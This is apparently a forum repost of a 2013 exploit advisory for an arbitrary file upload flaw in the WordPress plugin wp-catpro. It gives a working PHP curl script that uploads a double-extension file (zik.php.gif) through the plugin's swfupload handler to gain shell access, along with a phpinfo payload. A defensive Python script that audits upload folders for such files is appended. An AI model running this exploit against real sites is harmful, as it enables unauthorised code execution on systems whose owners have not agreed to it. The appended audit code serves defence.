中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: WordPress plugin wp-catpro arbitrary file upload
Author: admin
Time: 2013-2-27 20:12
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7, Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
$ch = curl_init("http://[www.2cto.com]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

# Shell Access : http://[www.xxx.com]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>
<?php
phpinfo();
?>
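
Added example (not part of the original advisory or the plugin's code): a Python audit of an uploads directory for files like the zik.php.gif described above. It assumes the upload handler compares only the final extension against the quoted allowlist; SCRIPT_EXT, the function names and the sample files are constructed for illustration.

```python
import os
import re
import tempfile

ALLOWED_EXT = {"jpg", "gif", "png"}  # allowlist quoted in the advisory
# Assumption: extensions a web server may be configured to execute as PHP.
SCRIPT_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}
MAGIC = {"jpg": b"\xff\xd8\xff", "gif": b"GIF8", "png": b"\x89PNG\r\n\x1a\n"}

def last_ext_only(name):
    """Weak check (assumed plugin behaviour): only the final extension counts."""
    return name.rsplit(".", 1)[-1].lower() in ALLOWED_EXT

def audit_file(path):
    """Return the reasons an uploaded file is suspicious (empty list = clean)."""
    parts = os.path.basename(path).lower().split(".")
    reasons = []
    if any(p in SCRIPT_EXT for p in parts[1:]):
        reasons.append("script extension in file name")
    with open(path, "rb") as fh:
        data = fh.read()
    magic = MAGIC.get(parts[-1])
    if magic is not None and not data.startswith(magic):
        reasons.append("content does not match image type")
    if re.search(rb"<\?php", data, re.I):
        reasons.append("PHP open tag in content")
    return reasons

def audit_dir(root):
    """Walk an uploads directory and map each flagged file name to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            reasons = audit_file(os.path.join(dirpath, fname))
            if reasons:
                findings[fname] = reasons
    return findings

def demo():
    """Audit constructed sample files written to a temporary directory."""
    with tempfile.TemporaryDirectory() as root:
        samples = {"photo.gif": b"GIF89a" + b"\x00" * 16,
                   "zik.php.gif": b"<?php phpinfo(); ?>"}
        for fname, body in samples.items():
            with open(os.path.join(root, fname), "wb") as fh:
                fh.write(body)
        return audit_dir(root)

if __name__ == "__main__":
    print(demo())
```

On a real site, point audit_dir at the wp-content/uploads tree and review every flagged file before deleting it.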